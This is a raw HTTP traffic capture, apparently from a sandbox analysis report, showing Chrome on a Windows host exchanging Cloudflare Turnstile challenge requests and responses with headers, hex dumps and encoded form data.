                                                                                                                  2024-12-19 10:43:07 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 59 00 00 00 14 08 02 00 00 00 69 af 06 4a 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                  Data Ascii: PNGIHDRYiJIDAT$IENDB`


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  17192.168.2.1649737104.18.95.414436456C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-19 10:43:08 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8f46c9ee5ddec342/1734604981425/pRF8XJBISw1z0s_ HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-12-19 10:43:09 UTC200INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 19 Dec 2024 10:43:09 GMT
                                                                                                                  Content-Type: image/png
                                                                                                                  Content-Length: 61
                                                                                                                  Connection: close
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f46ca3d3daede98-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-12-19 10:43:09 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 59 00 00 00 14 08 02 00 00 00 69 af 06 4a 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                  Data Ascii: PNGIHDRYiJIDAT$IENDB`


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  18192.168.2.1649738104.18.94.414436456C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-19 10:43:08 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1718986187:1734603138:-fuB_9i_IyGwMpgw4KoVOm2lwYp9o5GhGCFPndHyn94/8f46c9ee5ddec342/e4jgsEtzF8zS5O9Prw1FFzFVATU.c4HRwGt6tabItaY-1734604976-1.1.1.1-SBt7hdxj6oQKcNR43FPZOZS6J2uULEN0KrtHmHgHyichxkNPYU63fWdC1DfmYnWv HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  Content-Length: 31737
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  Content-type: application/x-www-form-urlencoded
                                                                                                                  CF-Chl-RetryAttempt: 0
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  CF-Challenge: e4jgsEtzF8zS5O9Prw1FFzFVATU.c4HRwGt6tabItaY-1734604976-1.1.1.1-SBt7hdxj6oQKcNR43FPZOZS6J2uULEN0KrtHmHgHyichxkNPYU63fWdC1DfmYnWv
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Origin: https://challenges.cloudflare.com
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/8b8uu/0x4AAAAAAA1vkTuRch78Npt4/auto/fbE/normal/auto/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-12-19 10:43:08 UTC16384OUTData Raw: 76 5f 38 66 34 36 63 39 65 65 35 64 64 65 63 33 34 32 3d 48 25 32 62 62 73 6d 67 58 56 52 49 2b 58 52 44 56 58 69 6b 76 6b 5a 44 30 58 47 6b 70 6b 57 72 58 42 58 48 6b 50 72 79 42 6b 43 36 6b 51 72 59 4e 58 64 58 63 6b 71 35 30 34 71 58 45 6b 7a 64 6b 58 52 35 6b 56 73 67 4e 6b 2b 73 73 53 35 35 6b 6e 72 67 43 51 63 53 6b 58 53 6b 30 72 6b 6f 6b 35 72 58 32 4d 6e 6b 4b 73 30 6b 69 73 44 42 31 34 67 73 59 50 31 46 30 6c 35 6b 31 34 41 55 6b 59 4e 46 57 35 76 31 47 24 49 71 67 6b 6b 4e 34 6b 49 61 35 44 58 42 6b 4d 72 58 66 6b 58 56 6b 67 72 34 6b 32 55 59 35 43 35 6b 54 6b 79 34 2b 4f 37 6d 2b 65 78 32 6b 67 37 42 2b 41 4d 6d 62 64 6e 72 32 57 4d 52 34 44 59 73 44 6b 6b 75 55 56 78 42 2b 4e 4c 4b 71 63 58 42 32 46 6d 31 31 6f 6f 62 24 64 4b 42 53 44 5a 71
                                                                                                                  Data Ascii: v_8f46c9ee5ddec342=H%2bbsmgXVRI+XRDVXikvkZD0XGkpkWrXBXHkPryBkC6kQrYNXdXckq504qXEkzdkXR5kVsgNk+ssS55knrgCQcSkXSk0rkok5rX2MnkKs0kisDB14gsYP1F0l5k14AUkYNFW5v1G$IqgkkN4kIa5DXBkMrXfkXVkgr4k2UY5C5kTky4+O7m+ex2kg7B+AMmbdnr2WMR4DYsDkkuUVxB+NLKqcXB2Fm11oob$dKBSDZq
                                                                                                                  2024-12-19 10:43:08 UTC15353OUTData Raw: 73 4a 42 4b 37 6f 76 41 6d 66 79 47 43 72 69 42 49 30 4d 6b 7a 66 59 46 51 33 62 4e 62 58 64 37 34 33 30 6b 58 53 6b 6b 6b 39 54 73 6d 61 6b 46 4e 49 43 6b 6a 6b 53 73 58 72 6b 4e 72 77 35 62 51 67 6c 62 31 53 59 62 67 73 58 2b 6b 34 24 58 35 6b 68 6b 62 73 67 52 6b 47 73 48 73 58 70 34 61 52 30 35 6b 46 73 57 6b 44 73 58 50 6b 71 6b 79 6b 6b 52 73 51 55 30 50 67 71 73 48 6b 4e 2d 6b 41 6b 66 4c 31 62 59 53 6b 43 6b 36 62 6b 79 35 31 73 58 52 59 71 6b 77 73 63 72 59 24 6b 65 73 4e 24 6b 67 35 44 6b 49 6b 59 69 6b 75 73 6b 2b 59 4d 6b 46 6b 31 72 67 33 6b 4a 6b 79 68 67 79 73 39 73 44 31 50 65 34 6f 35 78 4b 59 46 51 44 6b 48 64 59 43 6b 33 6d 79 53 6d 31 6b 66 52 63 38 70 37 35 42 73 56 30 58 4b 6b 59 4e 6b 62 67 6f 58 24 73 7a 38 24 76 72 4a 73 59 6e 4f
                                                                                                                  Data Ascii: sJBK7ovAmfyGCriBI0MkzfYFQ3bNbXd7430kXSkkk9TsmakFNICkjkSsXrkNrw5bQglb1SYbgsX+k4$X5khkbsgRkGsHsXp4aR05kFsWkDsXPkqkykkRsQU0PgqsHkN-kAkfL1bYSkCk6bky51sXRYqkwscrY$kesN$kg5DkIkYikusk+YMkFk1rg3kJkyhgys9sD1Pe4o5xKYFQDkHdYCk3mySm1kfRc8p75BsV0XKkYNkbgoX$sz8$vrJsYnO
                                                                                                                  2024-12-19 10:43:09 UTC330INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 19 Dec 2024 10:43:09 GMT
                                                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                                                  Content-Length: 26284
                                                                                                                  Connection: close
                                                                                                                  cf-chl-gen: vA8ZM2pPybMcDnRvJff5qlKmS4p4ztrmvkTRJZiDglvEHkrTqqAVPX4nozS88GWlaEevnNM1MgvJ3iqd$pezG7TYERe+QYmr2
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f46ca3e4d018c81-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-12-19 10:43:09 UTC1039INData Raw: 77 37 75 56 79 62 54 43 77 59 57 2b 78 39 4b 63 77 4d 4c 48 71 73 57 76 7a 4c 69 6b 79 70 6d 38 71 4c 6e 67 73 37 47 39 78 5a 36 6e 75 4d 57 31 31 38 50 4f 30 4b 4c 49 36 4c 36 71 34 39 4f 32 38 74 6e 56 31 36 37 54 75 4c 76 4a 73 37 69 39 77 76 50 32 32 39 54 58 35 63 55 4f 43 4d 6a 70 7a 51 49 4f 44 68 62 53 38 4e 4c 6d 43 4e 48 37 37 4e 6f 65 39 66 48 73 44 77 77 4f 42 67 6a 66 45 66 4d 71 46 76 33 34 47 75 63 64 45 6a 4d 6c 46 69 59 32 49 51 6f 46 44 54 4d 77 2b 69 38 51 4d 2f 7a 30 49 7a 59 75 4d 7a 34 63 46 30 45 2b 49 6b 5a 50 4b 7a 30 36 51 30 6b 2b 49 6b 38 56 47 52 42 4c 53 31 59 35 51 43 30 38 4c 30 73 37 51 53 34 68 59 45 46 66 51 6a 78 67 58 7a 73 76 52 30 77 75 63 55 78 45 54 7a 4e 4f 65 7a 56 45 5a 31 31 4a 62 32 6b 38 63 7a 78 4f 62 6c 46
                                                                                                                  Data Ascii: w7uVybTCwYW+x9KcwMLHqsWvzLikypm8qLngs7G9xZ6nuMW118PO0KLI6L6q49O28tnV167TuLvJs7i9wvP229TX5cUOCMjpzQIODhbS8NLmCNH77Noe9fHsDwwOBgjfEfMqFv34GucdEjMlFiY2IQoFDTMw+i8QM/z0IzYuMz4cF0E+IkZPKz06Q0k+Ik8VGRBLS1Y5QC08L0s7QS4hYEFfQjxgXzsvR0wucUxETzNOezVEZ11Jb2k8czxOblF
                                                                                                                  2024-12-19 10:43:09 UTC1369INData Raw: 51 72 71 4f 74 6b 36 2b 6e 79 39 75 33 7a 70 6d 35 7a 4c 4f 30 33 39 43 69 75 75 6d 70 32 38 6d 39 32 61 4c 6b 72 36 6e 4d 30 75 65 79 32 4c 4b 35 30 64 65 30 39 66 66 5a 75 64 54 53 30 37 2b 34 2b 41 6e 57 33 63 50 6b 33 65 66 4e 38 65 45 48 79 76 4c 6d 35 77 77 5a 39 65 55 62 48 68 51 63 2b 67 6b 4b 36 75 38 59 2f 52 33 37 34 78 58 6c 49 67 37 6c 48 79 6f 4c 43 69 41 78 42 77 62 76 45 52 59 6e 4c 44 77 65 39 43 6f 5a 47 78 4c 35 52 53 45 44 2f 44 59 31 52 41 4e 4b 53 42 74 4b 48 45 59 2b 55 43 77 6a 51 53 34 54 51 30 59 79 4c 45 74 49 4e 6c 59 54 55 46 6c 62 4a 44 6b 35 4d 57 64 66 4a 47 46 68 50 47 5a 4c 62 6b 52 77 63 45 67 79 64 55 4d 35 62 45 78 4e 4d 30 67 36 55 44 65 41 64 54 2b 45 68 32 39 56 58 6d 56 4c 68 59 75 45 67 5a 46 6a 53 6c 4b 41 52 32
                                                                                                                  Data Ascii: QrqOtk6+ny9u3zpm5zLO039Ciuump28m92aLkr6nM0uey2LK50de09ffZudTS07+4+AnW3cPk3efN8eEHyvLm5wwZ9eUbHhQc+gkK6u8Y/R374xXlIg7lHyoLCiAxBwbvERYnLDwe9CoZGxL5RSED/DY1RANKSBtKHEY+UCwjQS4TQ0YyLEtINlYTUFlbJDk5MWdfJGFhPGZLbkRwcEgydUM5bExNM0g6UDeAdT+Eh29VXmVLhYuEgZFjSlKAR2
                                                                                                                  2024-12-19 10:43:09 UTC1369INData Raw: 76 71 65 30 31 38 6d 71 73 70 62 61 6f 75 44 6a 73 63 72 70 37 65 7a 67 34 2b 50 77 32 75 54 6e 30 4d 72 72 35 4e 4b 79 31 37 4f 35 33 74 79 35 32 66 33 67 41 75 50 76 2f 65 50 41 36 2b 45 47 79 63 62 38 34 76 44 68 37 77 76 51 41 75 6f 55 44 75 37 6c 2b 76 62 51 44 2b 34 69 33 79 4c 34 42 2f 49 67 46 41 54 37 43 2b 51 68 49 67 54 72 49 77 44 7a 46 69 2f 32 44 67 4c 79 50 44 55 33 50 78 37 36 45 76 6b 38 50 6a 73 41 50 54 49 38 53 53 6f 71 51 43 49 4d 4c 69 30 39 47 77 6f 2f 54 54 46 5a 51 55 6f 57 4a 7a 5a 51 53 54 42 67 58 45 73 57 56 46 67 32 5a 6a 67 68 61 43 4e 6e 4a 32 56 71 63 45 5a 66 51 32 52 6f 59 30 45 34 51 7a 74 51 55 6d 31 50 63 44 35 55 55 56 78 6c 55 32 42 37 66 56 74 66 67 31 70 46 69 57 4a 79 55 6c 39 6e 6a 4a 56 32 5a 47 5a 6a 63 33 64
                                                                                                                  Data Ascii: vqe018mqspbaouDjscrp7ezg4+Pw2uTn0Mrr5NKy17O53ty52f3gAuPv/ePA6+EGycb84vDh7wvQAuoUDu7l+vbQD+4i3yL4B/IgFAT7C+QhIgTrIwDzFi/2DgLyPDU3Px76Evk8PjsAPTI8SSoqQCIMLi09Gwo/TTFZQUoWJzZQSTBgXEsWVFg2ZjghaCNnJ2VqcEZfQ2RoY0E4QztQUm1PcD5UUVxlU2B7fVtfg1pFiWJyUl9njJV2ZGZjc3d
                                                                                                                  2024-12-19 10:43:09 UTC1369INData Raw: 63 57 34 6e 75 47 66 77 75 50 49 6e 75 47 6b 78 71 37 45 30 62 47 76 79 2b 76 34 73 64 4c 4a 37 50 76 5a 7a 63 71 38 38 76 6a 56 77 66 48 34 36 4f 62 33 78 39 72 55 33 4d 6e 68 37 42 49 46 7a 2b 50 32 37 76 54 50 31 66 63 45 36 66 67 5a 32 50 4c 37 4a 50 58 74 45 42 2f 79 4b 50 30 42 2b 53 30 63 44 69 63 69 2b 65 30 78 4e 53 51 76 4c 77 62 30 41 7a 51 57 4c 54 55 33 48 77 34 42 4d 77 30 6a 52 54 77 68 46 51 74 4b 48 69 46 4b 43 30 59 6c 4e 42 30 71 46 45 73 72 56 30 49 5a 4e 54 6b 51 4f 42 67 68 55 30 77 73 4d 6b 34 76 4d 54 46 71 50 57 41 36 53 45 42 6b 63 44 49 38 51 44 4a 53 56 46 46 79 52 6e 5a 4b 4f 58 4d 2f 61 56 64 32 62 6f 52 68 65 58 4a 53 66 49 74 4c 65 58 74 4e 66 6d 70 52 62 6c 31 67 67 55 39 78 61 46 53 48 56 6d 64 5a 58 58 68 67 58 6d 4a 74
                                                                                                                  Data Ascii: cW4nuGfwuPInuGkxq7E0bGvy+v4sdLJ7PvZzcq88vjVwfH46Ob3x9rU3Mnh7BIFz+P27vTP1fcE6fgZ2PL7JPXtEB/yKP0B+S0cDici+e0xNSQvLwb0AzQWLTU3Hw4BMw0jRTwhFQtKHiFKC0YlNB0qFEsrV0IZNTkQOBghU0wsMk4vMTFqPWA6SEBkcDI8QDJSVFFyRnZKOXM/aVd2boRheXJSfItLeXtNfmpRbl1ggU9xaFSHVmdZXXhgXmJt
                                                                                                                  2024-12-19 10:43:09 UTC1369INData Raw: 6e 66 78 4e 2f 6b 71 2b 4c 5a 7a 4b 72 45 34 4e 4c 78 79 72 43 35 78 62 66 56 31 4e 7a 49 30 4f 79 2f 78 50 37 36 77 66 4d 44 39 38 6a 4d 79 77 62 4c 44 38 6a 72 30 41 33 52 37 4e 49 42 34 39 4c 6e 44 4f 6b 57 39 66 6f 55 2b 52 34 47 39 68 50 69 42 78 67 59 4a 50 6b 4f 47 51 6a 73 49 2f 45 4a 48 68 41 43 43 51 2f 78 2b 54 55 59 50 51 67 4a 44 6a 34 4c 46 52 77 55 45 30 49 55 53 41 51 56 49 6b 30 34 51 77 35 43 51 30 41 6d 4e 46 42 4b 4b 31 45 59 55 42 67 62 56 55 74 59 4d 44 64 61 49 6a 39 6b 57 30 70 57 54 46 74 4f 57 53 64 66 5a 30 63 72 59 7a 41 6f 52 57 6c 59 61 6c 46 6f 58 6b 78 59 65 46 42 55 55 48 70 42 62 6c 56 35 52 56 68 37 66 47 32 4f 58 59 43 48 61 49 74 2b 69 6f 70 68 6b 46 61 4a 56 59 32 46 69 6e 43 53 63 48 52 31 6c 4a 75 53 65 35 47 66 6d
                                                                                                                  Data Ascii: nfxN/kq+LZzKrE4NLxyrC5xbfV1NzI0Oy/xP76wfMD98jMywbLD8jr0A3R7NIB49LnDOkW9foU+R4G9hPiBxgYJPkOGQjsI/EJHhACCQ/x+TUYPQgJDj4LFRwUE0IUSAQVIk04Qw5CQ0AmNFBKK1EYUBgbVUtYMDdaIj9kW0pWTFtOWSdfZ0crYzAoRWlYalFoXkxYeFBUUHpBblV5RVh7fG2OXYCHaIt+iophkFaJVY2FinCScHR1lJuSe5Gfm
                                                                                                                  2024-12-19 10:43:09 UTC1369INData Raw: 78 36 63 33 41 36 2f 66 4b 36 64 62 32 30 4f 37 7a 2b 64 4b 34 38 37 6e 5a 75 2f 7a 6e 32 75 50 33 78 50 62 59 35 68 44 39 42 75 76 6c 42 41 76 7a 33 76 44 6e 2b 74 4d 4d 45 78 37 75 44 2b 2f 64 37 68 45 42 42 79 59 56 34 52 33 36 42 68 34 43 4b 77 55 50 37 4f 73 4f 4a 65 77 30 46 68 51 53 2b 42 59 77 4d 44 6f 57 44 43 33 35 4e 41 41 63 47 54 45 2f 52 68 30 6b 47 53 63 42 50 55 63 7a 54 30 55 6c 4d 31 68 47 54 6a 4d 70 52 6a 77 65 56 6a 6f 74 57 47 51 33 56 6b 4e 6a 50 56 74 67 5a 6a 38 6c 59 43 5a 47 4b 47 6c 55 52 31 42 6b 4d 57 4e 46 55 79 31 70 63 33 70 52 57 46 46 36 56 58 52 55 57 34 56 68 66 6c 64 42 64 47 6c 39 59 57 53 52 54 55 74 39 68 6e 64 70 61 33 4e 61 66 48 46 6f 6d 58 46 2b 65 31 6c 65 65 56 39 2f 63 35 57 65 5a 33 6d 58 6f 35 61 41 69 49
                                                                                                                  Data Ascii: x6c3A6/fK6db20O7z+dK487nZu/zn2uP3xPbY5hD9BuvlBAvz3vDn+tMMEx7uD+/d7hEBByYV4R36Bh4CKwUP7OsOJew0FhQS+BYwMDoWDC35NAAcGTE/Rh0kGScBPUczT0UlM1hGTjMpRjweVjotWGQ3VkNjPVtgZj8lYCZGKGlUR1BkMWNFUy1pc3pRWFF6VXRUW4VhfldBdGl9YWSRTUt9hndpa3NafHFomXF+e1leeV9/c5WeZ3mXo5aAiI
                                                                                                                  2024-12-19 10:43:09 UTC1369INData Raw: 37 73 2f 4a 36 37 66 58 7a 2b 37 67 41 74 62 74 31 41 4c 52 39 74 6a 78 32 50 6f 44 43 75 4c 2b 79 77 30 52 42 41 73 53 34 77 66 34 47 75 77 4c 45 78 4c 74 45 65 2f 72 39 42 54 30 45 76 51 57 34 78 62 34 48 66 77 69 2b 78 6f 42 4b 67 41 6b 46 54 59 48 4a 77 6b 6d 42 69 77 7a 4f 54 30 77 4e 78 77 56 4e 52 55 36 47 7a 67 2f 4f 68 34 38 42 78 67 67 51 45 63 2b 48 6b 4d 31 53 69 74 48 4b 56 6f 76 52 69 31 53 4d 46 41 78 54 6a 42 54 57 31 59 30 56 30 6c 6c 61 56 78 4e 57 6b 4a 66 5a 33 4a 42 59 7a 42 51 53 6d 64 59 52 45 78 72 63 33 35 54 63 47 46 75 56 58 4e 56 68 6c 64 79 57 58 70 66 65 6b 68 2b 58 6e 39 78 6a 6c 36 46 5a 57 75 56 69 49 39 34 61 6f 78 74 6c 6e 43 51 67 5a 4a 7a 6a 6e 57 57 65 4a 6c 35 6f 6e 32 62 6a 59 79 41 6f 49 42 38 67 71 57 46 6e 6f 4b
                                                                                                                  Data Ascii: 7s/J67fXz+7gAtbt1ALR9tjx2PoDCuL+yw0RBAsS4wf4GuwLExLtEe/r9BT0EvQW4xb4Hfwi+xoBKgAkFTYHJwkmBiwzOT0wNxwVNRU6Gzg/Oh48BxggQEc+HkM1SitHKVovRi1SMFAxTjBTW1Y0V0llaVxNWkJfZ3JBYzBQSmdYRExrc35TcGFuVXNVhldyWXpfekh+Xn9xjl6FZWuViI94aoxtlnCQgZJzjnWWeJl5on2bjYyAoIB8gqWFnoK
                                                                                                                  2024-12-19 10:43:09 UTC1369INData Raw: 4e 33 4f 7a 75 44 69 76 74 6f 46 34 76 33 4a 35 2f 58 59 79 63 54 70 37 2b 72 6f 2f 65 51 4e 47 50 59 4c 44 64 48 32 45 75 66 78 45 41 44 32 44 2f 30 45 2f 76 77 53 2b 43 4c 38 46 75 62 32 4b 52 33 6e 4b 65 6b 50 4b 76 34 54 49 79 77 50 4a 79 63 4b 47 2f 63 64 44 76 30 67 4c 7a 67 62 53 44 49 44 45 79 45 35 42 41 35 4e 4b 77 73 53 4b 7a 34 69 48 77 30 30 4f 43 4d 30 53 52 52 56 46 6a 78 57 4b 7a 68 4f 48 79 39 42 56 53 45 2f 61 55 67 6e 4c 6b 74 61 50 6b 73 70 55 56 51 2f 56 47 55 77 63 54 4a 58 58 45 64 35 61 6f 4a 43 5a 47 52 6c 68 58 52 31 51 49 46 43 61 57 78 58 63 48 42 78 6b 59 42 2b 54 31 39 34 65 48 6d 56 69 49 6c 55 6c 56 5a 39 63 47 75 45 68 49 57 68 6c 4a 4a 6a 63 34 79 4d 6a 61 57 63 6e 57 69 70 61 70 42 76 66 35 69 59 6d 62 47 6f 70 6e 65 48
                                                                                                                  Data Ascii: N3OzuDivtoF4v3J5/XYycTp7+ro/eQNGPYLDdH2EufxEAD2D/0E/vwS+CL8Fub2KR3nKekPKv4TIywPJycKG/cdDv0gLzgbSDIDEyE5BA5NKwsSKz4iHw00OCM0SRRVFjxWKzhOHy9BVSE/aUgnLktaPkspUVQ/VGUwcTJXXEd5aoJCZGRlhXR1QIFCaWxXcHBxkYB+T194eHmViIlUlVZ9cGuEhIWhlJJjc4yMjaWcnWipapBvf5iYmbGopneH


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  19192.168.2.1649739104.18.95.414436456C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-19 10:43:11 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1718986187:1734603138:-fuB_9i_IyGwMpgw4KoVOm2lwYp9o5GhGCFPndHyn94/8f46c9ee5ddec342/e4jgsEtzF8zS5O9Prw1FFzFVATU.c4HRwGt6tabItaY-1734604976-1.1.1.1-SBt7hdxj6oQKcNR43FPZOZS6J2uULEN0KrtHmHgHyichxkNPYU63fWdC1DfmYnWv HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-12-19 10:43:11 UTC379INHTTP/1.1 404 Not Found
                                                                                                                  Date: Thu, 19 Dec 2024 10:43:11 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 7
                                                                                                                  Connection: close
                                                                                                                  cf-chl-out: 6p6hHQa6TUjt4UxzOxFBhyyy1xKj+7yqMF0=$czdvQNhZL58RYm1T
                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f46ca4bce704263-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-12-19 10:43:11 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                  Data Ascii: invalid


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  20192.168.2.1649740104.18.94.414436456C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-19 10:43:14 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1718986187:1734603138:-fuB_9i_IyGwMpgw4KoVOm2lwYp9o5GhGCFPndHyn94/8f46c9ee5ddec342/e4jgsEtzF8zS5O9Prw1FFzFVATU.c4HRwGt6tabItaY-1734604976-1.1.1.1-SBt7hdxj6oQKcNR43FPZOZS6J2uULEN0KrtHmHgHyichxkNPYU63fWdC1DfmYnWv HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  Content-Length: 34074
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  Content-type: application/x-www-form-urlencoded
                                                                                                                  CF-Chl-RetryAttempt: 0
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  CF-Challenge: e4jgsEtzF8zS5O9Prw1FFzFVATU.c4HRwGt6tabItaY-1734604976-1.1.1.1-SBt7hdxj6oQKcNR43FPZOZS6J2uULEN0KrtHmHgHyichxkNPYU63fWdC1DfmYnWv
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Origin: https://challenges.cloudflare.com
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/8b8uu/0x4AAAAAAA1vkTuRch78Npt4/auto/fbE/normal/auto/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-12-19 10:43:14 UTC16384OUTData Raw: 76 5f 38 66 34 36 63 39 65 65 35 64 64 65 63 33 34 32 3d 48 25 32 62 62 73 6d 67 58 56 52 49 2b 58 52 44 56 58 69 6b 76 6b 5a 44 30 58 47 6b 70 6b 57 72 58 42 58 48 6b 50 72 79 42 6b 43 36 6b 51 72 59 4e 58 64 58 63 6b 71 35 30 34 71 58 45 6b 7a 64 6b 58 52 35 6b 56 73 67 4e 6b 2b 73 73 53 35 35 6b 6e 72 67 43 51 63 53 6b 58 53 6b 30 72 6b 6f 6b 35 72 58 32 4d 6e 6b 4b 73 30 6b 69 73 44 42 31 34 67 73 59 50 31 46 30 6c 35 6b 31 34 41 55 6b 59 4e 46 57 35 76 31 47 24 49 71 67 6b 6b 4e 34 6b 49 61 35 44 58 42 6b 4d 72 58 66 6b 58 56 6b 67 72 34 6b 32 55 59 35 43 35 6b 54 6b 79 34 2b 4f 37 6d 2b 65 78 32 6b 67 37 42 2b 41 4d 6d 62 64 6e 72 32 57 4d 52 34 44 59 73 44 6b 6b 75 55 56 78 42 2b 4e 4c 4b 71 63 58 42 32 46 6d 31 31 6f 6f 62 24 64 4b 42 53 44 5a 71
                                                                                                                  Data Ascii: v_8f46c9ee5ddec342=H%2bbsmgXVRI+XRDVXikvkZD0XGkpkWrXBXHkPryBkC6kQrYNXdXckq504qXEkzdkXR5kVsgNk+ssS55knrgCQcSkXSk0rkok5rX2MnkKs0kisDB14gsYP1F0l5k14AUkYNFW5v1G$IqgkkN4kIa5DXBkMrXfkXVkgr4k2UY5C5kTky4+O7m+ex2kg7B+AMmbdnr2WMR4DYsDkkuUVxB+NLKqcXB2Fm11oob$dKBSDZq
                                                                                                                  2024-12-19 10:43:14 UTC16384OUTData Raw: 73 4a 42 4b 37 6f 76 41 6d 66 79 47 43 72 69 42 49 30 4d 6b 7a 66 59 46 51 33 62 4e 62 58 64 37 34 33 30 6b 58 53 6b 6b 6b 39 54 73 6d 61 6b 46 4e 49 43 6b 6a 6b 53 73 58 72 6b 4e 72 77 35 62 51 67 6c 62 31 53 59 62 67 73 58 2b 6b 34 24 58 35 6b 68 6b 62 73 67 52 6b 47 73 48 73 58 70 34 61 52 30 35 6b 46 73 57 6b 44 73 58 50 6b 71 6b 79 6b 6b 52 73 51 55 30 50 67 71 73 48 6b 4e 2d 6b 41 6b 66 4c 31 62 59 53 6b 43 6b 36 62 6b 79 35 31 73 58 52 59 71 6b 77 73 63 72 59 24 6b 65 73 4e 24 6b 67 35 44 6b 49 6b 59 69 6b 75 73 6b 2b 59 4d 6b 46 6b 31 72 67 33 6b 4a 6b 79 68 67 79 73 39 73 44 31 50 65 34 6f 35 78 4b 59 46 51 44 6b 48 64 59 43 6b 33 6d 79 53 6d 31 6b 66 52 63 38 70 37 35 42 73 56 30 58 4b 6b 59 4e 6b 62 67 6f 58 24 73 7a 38 24 76 72 4a 73 59 6e 4f
                                                                                                                  Data Ascii: sJBK7ovAmfyGCriBI0MkzfYFQ3bNbXd7430kXSkkk9TsmakFNICkjkSsXrkNrw5bQglb1SYbgsX+k4$X5khkbsgRkGsHsXp4aR05kFsWkDsXPkqkykkRsQU0PgqsHkN-kAkfL1bYSkCk6bky51sXRYqkwscrY$kesN$kg5DkIkYikusk+YMkFk1rg3kJkyhgys9sD1Pe4o5xKYFQDkHdYCk3mySm1kfRc8p75BsV0XKkYNkbgoX$sz8$vrJsYnO
